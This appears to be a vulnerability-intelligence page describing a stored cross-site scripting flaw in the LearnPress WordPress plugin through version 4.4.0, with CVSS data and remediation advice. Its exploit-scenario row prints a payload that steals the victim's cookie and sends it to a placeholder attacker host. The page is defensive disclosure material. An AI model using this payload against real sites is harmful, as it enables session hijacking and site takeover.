Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS requires victim page view (UI:R per CVSS guidance); contributor access required (PR:L); scope changes to victim browser (S:C); no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The LearnPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_wrapper_form' shortcode attribute in versions up to, and including, 4.4.0. This is due to insufficient input sanitization and output escaping in the FilterCourseTemplate::sections() method at line 98, where the attacker-controlled attribute is inserted into an HTML class attribute via sprintf('<form class="%s">', $class_wrapper_form) without esc_attr() escaping. The FilterCourseShortcode::render() handler does not apply shortcode_atts() filtering, so raw user attributes flow directly through do_action('learn-press/filter-courses/layout', $data) into the template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the LearnPress WordPress LMS plugin (versions up to and including 4.4.0) allows authenticated contributors to permanently inject arbitrary JavaScript into WordPress pages via the unescaped 'class_wrapper_form' shortcode attribute. The payload persists in the database and executes in the browser of any visitor - including administrators - who loads the affected page, enabling session hijacking, credential harvesting, or privilege escalation through forged admin actions. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a WordPress contributor-level account (or higher) on the target site, making this a low-privilege authenticated attack. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 6.4 (Medium) reflects AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A threat actor registers or obtains a WordPress contributor account on a LearnPress-powered e-learning site, then creates a new page embedding the course-filter shortcode with a crafted class_wrapper_form attribute such as: x"><img src=x onerror=fetch('https://attacker.example/log?c='+document.cookie)>. After the page is published, any administrator who reviews or visits it triggers the payload in their browser, surrendering their session cookie - enabling full site takeover without further authentication. … |
| Remediation | Update LearnPress to a version above 4.4.0; the upstream fix is available in WordPress plugin Trac changeset 3587186 (https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3587186%40learnpress&new=3587186%40learnpress), though an exact patched release version is not independently confirmed from the available data - verify in the WordPress.org plugin changelog before deploying. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Course enrollment data exposure in LearnPress WordPress LMS plugin (all versions through 4.3.9.1) enables authenticated
Payment bypass in LearnPress WordPress LMS Plugin (all versions ≤ 4.3.5) allows authenticated subscribers to enroll in a
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40934
GHSA-qrp7-xr7v-h39q